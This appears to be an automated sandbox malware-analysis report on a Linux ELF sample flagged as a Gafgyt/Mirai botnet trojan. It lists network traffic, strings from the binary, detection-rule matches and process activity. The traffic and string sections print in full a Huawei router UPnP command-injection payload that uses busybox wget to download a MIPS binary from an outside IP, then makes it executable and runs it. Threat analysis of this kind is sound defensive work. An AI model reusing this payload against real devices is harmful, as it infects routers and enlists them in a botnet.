                  Source: unknownHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 491Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: KlgUGKamBf.elfString found in binary or memory: http://103.177.35.32/tajma.mpsl;
                  Source: KlgUGKamBf.elfString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                  Source: KlgUGKamBf.elfString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
                  Source: unknownNetwork traffic detected: HTTP traffic on port 43928 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 42836 -> 443

                  System Summary

                  barindex
                  Source: KlgUGKamBf.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
                  Source: KlgUGKamBf.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_9e9530a7 Author: unknown
                  Source: KlgUGKamBf.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_807911a2 Author: unknown
                  Source: KlgUGKamBf.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_ea92cca8 Author: unknown
                  Source: KlgUGKamBf.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_d4227dbf Author: unknown
                  Source: KlgUGKamBf.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_d996d335 Author: unknown
                  Source: KlgUGKamBf.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_d0c57a2e Author: unknown
                  Source: KlgUGKamBf.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_620087b9 Author: unknown
                  Source: KlgUGKamBf.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_0cd591cd Author: unknown
                  Source: KlgUGKamBf.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_33b4111a Author: unknown
                  Source: KlgUGKamBf.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_a33a8363 Author: unknown
                  Source: KlgUGKamBf.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_1e0c5ce0 Author: unknown
                  Source: KlgUGKamBf.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_520deeb8 Author: unknown
                  Source: KlgUGKamBf.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_6a77af0f Author: unknown
                  Source: KlgUGKamBf.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_01e4a728 Author: unknown
                  Source: KlgUGKamBf.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_e0cf29e2 Author: unknown
                  Source: 6207.1.0000000000400000.000000000041d000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
                  Source: 6207.1.0000000000400000.000000000041d000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_9e9530a7 Author: unknown
                  Source: 6207.1.0000000000400000.000000000041d000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_807911a2 Author: unknown
                  Source: 6207.1.0000000000400000.000000000041d000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_ea92cca8 Author: unknown
                  Source: 6207.1.0000000000400000.000000000041d000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d4227dbf Author: unknown
                  Source: 6207.1.0000000000400000.000000000041d000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d996d335 Author: unknown
                  Source: 6207.1.0000000000400000.000000000041d000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d0c57a2e Author: unknown
                  Source: 6207.1.0000000000400000.000000000041d000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_620087b9 Author: unknown
                  Source: 6207.1.0000000000400000.000000000041d000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_0cd591cd Author: unknown
                  Source: 6207.1.0000000000400000.000000000041d000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_33b4111a Author: unknown
                  Source: 6207.1.0000000000400000.000000000041d000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_a33a8363 Author: unknown
                  Source: 6207.1.0000000000400000.000000000041d000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_1e0c5ce0 Author: unknown
                  Source: 6207.1.0000000000400000.000000000041d000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_520deeb8 Author: unknown
                  Source: 6207.1.0000000000400000.000000000041d000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_6a77af0f Author: unknown
                  Source: 6207.1.0000000000400000.000000000041d000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_01e4a728 Author: unknown
                  Source: 6207.1.0000000000400000.000000000041d000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_e0cf29e2 Author: unknown
                  Source: Process Memory Space: KlgUGKamBf.elf PID: 6207, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
                  Source: Process Memory Space: KlgUGKamBf.elf PID: 6207, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_ea92cca8 Author: unknown
                  Source: Initial sampleString containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: Initial sampleString containing 'busybox' found: /bin/busybox/
                  Source: Initial sampleString containing 'busybox' found: /bin/busybox
                  Source: Initial sampleString containing 'busybox' found: HTTP/1.1 200 OKskyljneegay.armskyljneegay.arm5skyljneegay.arm6skyljneegay.arm7skyljneegay.mipsskyljneegay.mpslskyljneegay.x86_64skyljneegay.sh4<?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                  Source: Initial sampleString containing 'busybox' found: Content-Length: /proc//proc/%s/exe/proc/self/exe/var/Challenge//app/hi3511/gmDVRibox/usr/dvr_main _8182T_1108/mnt/mtd/app/gui/var/Kylin/l0 c/udevd/var/tmp/sonia/hicorestm_hi3511_dvr/bin/busybox//usr/lib/systemd/systemd/shellsys/boot/media/srv/var/run/lib/etc/dev/home/Davinci/telnetsshwatchdog/var/spool//var/Sofia/sshd/usr/compress/bin//compress/bin/compress/usr/bashtelnetddropbearencodercundi/var/cundi//var/Condi/system/root/dvr_gui//root/dvr_app//var/tmp//anko-app//data/local/tmp//usr/lib/systemd//system/system/bin//gm/bin//mnt//home/process//home/helper/home/davinci/z/bin//mnt/mtd//tmp/sqfs//usr/libexec//usr/sbin//z/zbin//usr/bin/usr/lib/openssh/sftp-server//opt/anko-app/ankosample _8182T_1104//usr/libexec/openssh/sftp-server/POST /goform/set_LimitClient_cfg HTTP/1.1
                  Source: Initial sampleString containing 'busybox' found: /proc/proc/%d/cmdlinewgetcurl/bin/busyboxechocatnanotfptkillallpkilltopxargspgrep
                  Source: ELF static info symbol of initial sample.symtab present: no
                  Source: KlgUGKamBf.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
                  Source: KlgUGKamBf.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_9e9530a7 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = d6ad6512051e87c8c35dc168d82edd071b122d026dce21d39b9782b3d6a01e50, id = 9e9530a7-ad4d-4a44-b764-437b7621052f, last_modified = 2021-09-16
                  Source: KlgUGKamBf.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_807911a2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = f409037091b7372f5a42bbe437316bd11c655e7a5fe1fcf83d1981cb5c4a389f, id = 807911a2-f6ec-4e65-924f-61cb065dafc6, last_modified = 2021-09-16
                  Source: KlgUGKamBf.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_ea92cca8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = aa4aee9f3d6bedd8234eaf8778895a0f5d71c42b21f2a428f01f121e85704e8e, id = ea92cca8-bba7-4a1c-9b88-a2d051ad0021, last_modified = 2021-09-16
                  Source: KlgUGKamBf.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_d4227dbf reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 58c4b1d4d167876b64cfa10f609911a80284180e4db093917fea16fae8ccd4e3, id = d4227dbf-6ab4-4637-a6ba-0e604acaafb4, last_modified = 2021-09-16
                  Source: KlgUGKamBf.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_d996d335 reference_sample = b511eacd4b44744c8cf82d1b4a9bc6f1022fe6be7c5d17356b171f727ddc6eda, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = e9ccb8412f32187c309b0e9afcc3a6da21ad2f1ffa251c27f9f720ccb284e3ac, id = d996d335-e049-4052-bf36-6cd07c911a8b, last_modified = 2021-09-16
                  Source: KlgUGKamBf.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_d0c57a2e os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ee7d3a33575ed3aa7431489a8fb18bf30cfd5d6c776066ab2a27f93303124b6, id = d0c57a2e-c10c-436c-be13-50a269326cf2, last_modified = 2021-09-16
                  Source: KlgUGKamBf.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_620087b9 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 06cd7e6eb62352ec2ccb9ed48e58c0583c02fefd137cd048d053ab30b5330307, id = 620087b9-c87d-4752-89e8-ca1c16486b28, last_modified = 2021-09-16
                  Source: KlgUGKamBf.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_0cd591cd os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 96c4ff70729ddb981adafd8c8277649a88a87e380d2f321dff53f0741675fb1b, id = 0cd591cd-c348-4c3a-a895-2063cf892cda, last_modified = 2021-09-16
                  Source: KlgUGKamBf.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_33b4111a reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 9c3b63b9a0f54006bae12abcefdb518904a85f78be573f0780f0a265b12d2d6e, id = 33b4111a-e59e-48db-9d74-34ca44fcd9f5, last_modified = 2021-09-16
                  Source: KlgUGKamBf.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_a33a8363 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 74f964eaadbf8f30d40cdec40b603c5141135d2e658e7ce217d0d6c62e18dd08, id = a33a8363-5511-4fe1-a0d8-75156b9ccfc7, last_modified = 2021-09-16
                  Source: KlgUGKamBf.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_1e0c5ce0 reference_sample = 5b1f95840caebf9721bf318126be27085ec08cf7881ec64a884211a934351c2d, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 8e45538b59f9c9b8bc49661069044900c8199e487714c715c1b1f970fd528e3b, id = 1e0c5ce0-3b76-4da4-8bed-2e5036b6ce79, last_modified = 2021-09-16
                  Source: KlgUGKamBf.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_520deeb8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f4dfd1d76e07ff875eedfe0ef4f861bee1e4d8e66d68385f602f29cc35e30cca, id = 520deeb8-cbc0-4225-8d23-adba5e040471, last_modified = 2021-09-16
                  Source: KlgUGKamBf.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_6a77af0f os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 4e436f509e7e732e3d0326bcbdde555bba0653213ddf31b43cfdfbe16abb0016, id = 6a77af0f-31fa-4793-82aa-10b065ba1ec0, last_modified = 2021-09-16
                  Source: KlgUGKamBf.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_01e4a728 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = d90477364982bdc6cd22079c245d866454475749f762620273091f2fab73c196, id = 01e4a728-7c1c-479b-aed0-cb76d64dbb02, last_modified = 2021-09-16
                  Source: KlgUGKamBf.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_e0cf29e2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 3f124c3c9f124264dfbbcca1e4b4d7cfcf3274170d4bf8966b6559045873948f, id = e0cf29e2-88d7-4aa4-b60a-c24626f2b246, last_modified = 2021-09-16
                  Source: 6207.1.0000000000400000.000000000041d000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
                  Source: 6207.1.0000000000400000.000000000041d000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_9e9530a7 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = d6ad6512051e87c8c35dc168d82edd071b122d026dce21d39b9782b3d6a01e50, id = 9e9530a7-ad4d-4a44-b764-437b7621052f, last_modified = 2021-09-16
                  Source: 6207.1.0000000000400000.000000000041d000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_807911a2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = f409037091b7372f5a42bbe437316bd11c655e7a5fe1fcf83d1981cb5c4a389f, id = 807911a2-f6ec-4e65-924f-61cb065dafc6, last_modified = 2021-09-16
                  Source: 6207.1.0000000000400000.000000000041d000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_ea92cca8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = aa4aee9f3d6bedd8234eaf8778895a0f5d71c42b21f2a428f01f121e85704e8e, id = ea92cca8-bba7-4a1c-9b88-a2d051ad0021, last_modified = 2021-09-16
                  Source: 6207.1.0000000000400000.000000000041d000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d4227dbf reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 58c4b1d4d167876b64cfa10f609911a80284180e4db093917fea16fae8ccd4e3, id = d4227dbf-6ab4-4637-a6ba-0e604acaafb4, last_modified = 2021-09-16
                  Source: 6207.1.0000000000400000.000000000041d000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d996d335 reference_sample = b511eacd4b44744c8cf82d1b4a9bc6f1022fe6be7c5d17356b171f727ddc6eda, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = e9ccb8412f32187c309b0e9afcc3a6da21ad2f1ffa251c27f9f720ccb284e3ac, id = d996d335-e049-4052-bf36-6cd07c911a8b, last_modified = 2021-09-16
                  Source: 6207.1.0000000000400000.000000000041d000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d0c57a2e os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ee7d3a33575ed3aa7431489a8fb18bf30cfd5d6c776066ab2a27f93303124b6, id = d0c57a2e-c10c-436c-be13-50a269326cf2, last_modified = 2021-09-16
                  Source: 6207.1.0000000000400000.000000000041d000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_620087b9 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 06cd7e6eb62352ec2ccb9ed48e58c0583c02fefd137cd048d053ab30b5330307, id = 620087b9-c87d-4752-89e8-ca1c16486b28, last_modified = 2021-09-16
                  Source: 6207.1.0000000000400000.000000000041d000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_0cd591cd os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 96c4ff70729ddb981adafd8c8277649a88a87e380d2f321dff53f0741675fb1b, id = 0cd591cd-c348-4c3a-a895-2063cf892cda, last_modified = 2021-09-16
                  Source: 6207.1.0000000000400000.000000000041d000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_33b4111a reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 9c3b63b9a0f54006bae12abcefdb518904a85f78be573f0780f0a265b12d2d6e, id = 33b4111a-e59e-48db-9d74-34ca44fcd9f5, last_modified = 2021-09-16
                  Source: 6207.1.0000000000400000.000000000041d000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_a33a8363 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 74f964eaadbf8f30d40cdec40b603c5141135d2e658e7ce217d0d6c62e18dd08, id = a33a8363-5511-4fe1-a0d8-75156b9ccfc7, last_modified = 2021-09-16
                  Source: 6207.1.0000000000400000.000000000041d000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_1e0c5ce0 reference_sample = 5b1f95840caebf9721bf318126be27085ec08cf7881ec64a884211a934351c2d, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 8e45538b59f9c9b8bc49661069044900c8199e487714c715c1b1f970fd528e3b, id = 1e0c5ce0-3b76-4da4-8bed-2e5036b6ce79, last_modified = 2021-09-16
                  Source: 6207.1.0000000000400000.000000000041d000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_520deeb8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f4dfd1d76e07ff875eedfe0ef4f861bee1e4d8e66d68385f602f29cc35e30cca, id = 520deeb8-cbc0-4225-8d23-adba5e040471, last_modified = 2021-09-16
                  Source: 6207.1.0000000000400000.000000000041d000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_6a77af0f os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 4e436f509e7e732e3d0326bcbdde555bba0653213ddf31b43cfdfbe16abb0016, id = 6a77af0f-31fa-4793-82aa-10b065ba1ec0, last_modified = 2021-09-16
                  Source: 6207.1.0000000000400000.000000000041d000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_01e4a728 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = d90477364982bdc6cd22079c245d866454475749f762620273091f2fab73c196, id = 01e4a728-7c1c-479b-aed0-cb76d64dbb02, last_modified = 2021-09-16
                  Source: 6207.1.0000000000400000.000000000041d000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_e0cf29e2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 3f124c3c9f124264dfbbcca1e4b4d7cfcf3274170d4bf8966b6559045873948f, id = e0cf29e2-88d7-4aa4-b60a-c24626f2b246, last_modified = 2021-09-16
                  Source: Process Memory Space: KlgUGKamBf.elf PID: 6207, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
                  Source: Process Memory Space: KlgUGKamBf.elf PID: 6207, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_ea92cca8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = aa4aee9f3d6bedd8234eaf8778895a0f5d71c42b21f2a428f01f121e85704e8e, id = ea92cca8-bba7-4a1c-9b88-a2d051ad0021, last_modified = 2021-09-16
                  Source: classification engineClassification label: mal100.troj.linELF@0/0@3/0
                  Source: /usr/bin/xfdesktop (PID: 6221)Directory: /home/saturnino/.Xdefaults-galassiaJump to behavior
                  Source: /usr/bin/xfdesktop (PID: 6227)Directory: /home/saturnino/.Xdefaults-galassiaJump to behavior
                  Source: /usr/bin/xfdesktop (PID: 6230)Directory: /home/saturnino/.Xdefaults-galassiaJump to behavior
                  Source: /usr/bin/xfdesktop (PID: 6233)Directory: /home/saturnino/.Xdefaults-galassiaJump to behavior
                  Source: /tmp/KlgUGKamBf.elf (PID: 6210)File opened: /proc/6230/cmdlineJump to behavior
                  Source: /tmp/KlgUGKamBf.elf (PID: 6210)File opened: /proc/6233/cmdlineJump to behavior
                  Source: /tmp/KlgUGKamBf.elf (PID: 6210)File opened: /proc/1582/cmdlineJump to behavior
                  Source: /tmp/KlgUGKamBf.elf (PID: 6210)File opened: /proc/3088/cmdlineJump to behavior
                  Source: /tmp/KlgUGKamBf.elf (PID: 6210)File opened: /proc/230/cmdlineJump to behavior
                  Source: /tmp/KlgUGKamBf.elf (PID: 6210)File opened: /proc/110/cmdlineJump to behavior
                  Source: /tmp/KlgUGKamBf.elf (PID: 6210)File opened: /proc/231/cmdlineJump to behavior
                  Source: /tmp/KlgUGKamBf.elf (PID: 6210)File opened: /proc/111/cmdlineJump to behavior
                  Source: /tmp/KlgUGKamBf.elf (PID: 6210)File opened: /proc/232/cmdlineJump to behavior
                  Source: /tmp/KlgUGKamBf.elf (PID: 6210)File opened: /proc/1579/cmdlineJump to behavior
                  Source: /tmp/KlgUGKamBf.elf (PID: 6210)File opened: /proc/112/cmdlineJump to behavior
                  Source: /tmp/KlgUGKamBf.elf (PID: 6210)File opened: /proc/233/cmdlineJump to behavior
                  Source: /tmp/KlgUGKamBf.elf (PID: 6210)File opened: /proc/1699/cmdlineJump to behavior
                  Source: /tmp/KlgUGKamBf.elf (PID: 6210)File opened: /proc/113/cmdlineJump to behavior
                  Source: /tmp/KlgUGKamBf.elf (PID: 6210)File opened: /proc/234/cmdlineJump to behavior
                  Source: /tmp/KlgUGKamBf.elf (PID: 6210)File opened: /proc/1335/cmdlineJump to behavior
                  Source: /tmp/KlgUGKamBf.elf (PID: 6210)File opened: /proc/1698/cmdlineJump to behavior
                  Source: /tmp/KlgUGKamBf.elf (PID: 6210)File opened: /proc/114/cmdlineJump to behavior
                  Source: /tmp/KlgUGKamBf.elf (PID: 6210)File opened: /proc/235/cmdlineJump to behavior
